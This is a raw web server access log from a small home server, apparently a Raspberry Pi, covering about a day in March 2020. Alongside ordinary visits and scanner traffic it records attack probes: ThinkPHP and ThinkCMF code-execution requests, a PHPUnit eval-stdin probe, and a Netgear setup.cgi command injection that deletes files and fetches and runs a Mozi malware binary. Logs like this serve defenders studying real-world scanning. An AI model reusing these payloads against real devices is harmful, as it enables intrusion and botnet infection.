Thu Mar 19 06:25:06 MDT 2020 06:25:06 up 23 days, 10:53, 1 user, load average: 0.52, 0.29, 0.25 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 23days 21:17 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE 185.41.248.172 - - [19/Mar/2020:13:31:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 5.101.0.209 - - [19/Mar/2020:13:39:24 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 222.186.19.221 - - [19/Mar/2020:13:39:33 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 5.101.0.209 - - [19/Mar/2020:13:47:04 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [19/Mar/2020:13:47:05 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [19/Mar/2020:13:53:20 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 171.67.70.85 - - [19/Mar/2020:14:09:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 188.138.133.157 - - [19/Mar/2020:14:13:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 188.138.133.157 - - [19/Mar/2020:14:13:31 +0000] "GET /shell?busybox HTTP/1.1" 400 0 "" "Mozilla/5.0" 188.138.133.157 - - [19/Mar/2020:14:13:35 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 170.254.73.162 - - [19/Mar/2020:15:49:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 192.241.237.209 - - [19/Mar/2020:15:52:48 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 185.204.183.177 - - [19/Mar/2020:17:56:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.243.132.225 - - [19/Mar/2020:18:20:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 60.191.52.254 - - [19/Mar/2020:18:50:07 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 60.191.52.254 - - [19/Mar/2020:18:50:08 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 178.93.50.187 - - [19/Mar/2020:18:53:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 168.195.152.83 - - [19/Mar/2020:18:55:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 189.152.200.248 - - [19/Mar/2020:19:17:02 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 190.94.144.254 - - [19/Mar/2020:19:21:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 86.17.170.154 - - [19/Mar/2020:19:26:11 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 86.17.170.154 - - [19/Mar/2020:19:26:11 +0000] "GET / HTTP/1.1" 200 25000 "" "" 176.37.182.83 - - [19/Mar/2020:19:30:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 80.82.70.118 - - [19/Mar/2020:19:34:12 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 92.118.161.57 - - [19/Mar/2020:19:49:24 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 169.197.108.42 - - [19/Mar/2020:19:51:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 171.67.70.85 - - [19/Mar/2020:19:55:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 5.101.0.209 - - [19/Mar/2020:20:15:35 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 208.30.123.43 - - [19/Mar/2020:20:56:04 +0000] "GET / HTTP/1.1" 400 0 "" "" 66.168.144.34 - - [19/Mar/2020:21:04:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 66.168.144.34 - - [19/Mar/2020:21:04:15 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 66.168.144.34 - - [19/Mar/2020:21:04:37 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 66.168.144.34 - - [19/Mar/2020:21:04:46 +0000] "GET /freedom/freedom.zip HTTP/1.1" 200 76173 "http://162.250.19.7/freedom/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 66.168.144.34 - - [19/Mar/2020:21:05:42 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.168.144.34 - - [19/Mar/2020:21:09:28 +0000] "GET /freedom/freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/freedom/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 66.168.144.34 - - [19/Mar/2020:21:09:28 +0000] "GET /freedom/freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/freedom/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 66.168.144.34 - - [19/Mar/2020:21:09:40 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.168.144.34 - - [19/Mar/2020:21:09:54 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.168.144.34 - - [19/Mar/2020:21:09:54 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.168.144.34 - - [19/Mar/2020:21:10:04 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.168.144.34 - - [19/Mar/2020:21:10:04 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.168.144.34 - - [19/Mar/2020:21:10:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.168.144.34 - - [19/Mar/2020:21:10:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.168.144.34 - - [19/Mar/2020:21:10:15 +0000] "GET /music/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 66.168.144.34 - - [19/Mar/2020:21:10:16 +0000] "GET /music/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 66.168.144.34 - - [19/Mar/2020:21:10:26 +0000] "GET /music/Songs/ HTTP/1.1" 200 25000 "http://162.250.19.7/music/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 66.168.144.34 - - [19/Mar/2020:21:10:32 +0000] "GET /music/Songs/Songs001.pdf HTTP/1.1" 200 381866 "http://162.250.19.7/music/Songs/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 66.168.144.34 - - [19/Mar/2020:21:10:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 96.56.205.210 - - [19/Mar/2020:21:26:29 +0000] "GET / HTTP/1.1" 400 0 "" "" 85.194.232.2 - - [20/Mar/2020:00:17:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 163.53.200.194 - - [20/Mar/2020:00:23:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 223.149.6.7 - - [20/Mar/2020:00:36:26 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 0 "" "" 37.179.145.116 - - [20/Mar/2020:00:37:38 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 37.1.6.241 - - [20/Mar/2020:01:19:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 171.67.70.85 - - [20/Mar/2020:01:55:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 155.93.160.145 - - [20/Mar/2020:03:07:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.243.129.134 - - [20/Mar/2020:05:19:58 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 115.233.218.202 - - [20/Mar/2020:05:30:38 +0000] "GET / HTTP/1.0" 200 25000 "" "" 177.84.40.150 - - [20/Mar/2020:06:09:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 193.57.40.38 - - [20/Mar/2020:06:12:30 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.57.40.38 - - [20/Mar/2020:06:39:23 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.57.40.38 - - [20/Mar/2020:06:57:56 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.57.40.38 - - [20/Mar/2020:07:11:59 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 171.67.70.85 - - [20/Mar/2020:07:54:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 193.57.40.38 - - [20/Mar/2020:08:39:04 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 122.224.129.237 - - [20/Mar/2020:08:52:29 +0000] "GET / HTTP/1.0" 200 25000 "" "" 202.101.190.110 - - [20/Mar/2020:08:58:36 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 181.120.8.172 - - [20/Mar/2020:08:59:03 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 HTTP/1.1" 400 0 "" "Mozilla/5.0" 193.29.15.107 - - [20/Mar/2020:09:15:16 +0000] "GET /login.php HTTP/1.1" 404 0 "" "" 169.197.108.42 - - [20/Mar/2020:09:43:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 191.255.147.100 - - [20/Mar/2020:10:36:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 222.186.19.221 - - [20/Mar/2020:11:37:59 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 123.179.4.196 - - [20/Mar/2020:12:09:53 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 124.88.113.172 - - [20/Mar/2020:12:09:54 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.01669615 Mozilla/5.0 (Linux; Android 5.1; S900PROBT Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Safari/537.36" Fri Mar 20 06:25:06 MDT 2020 06:25:07 up 24 days, 10:53, 1 user, load average: 0.35, 0.28, 0.25 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 24days 21:52 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE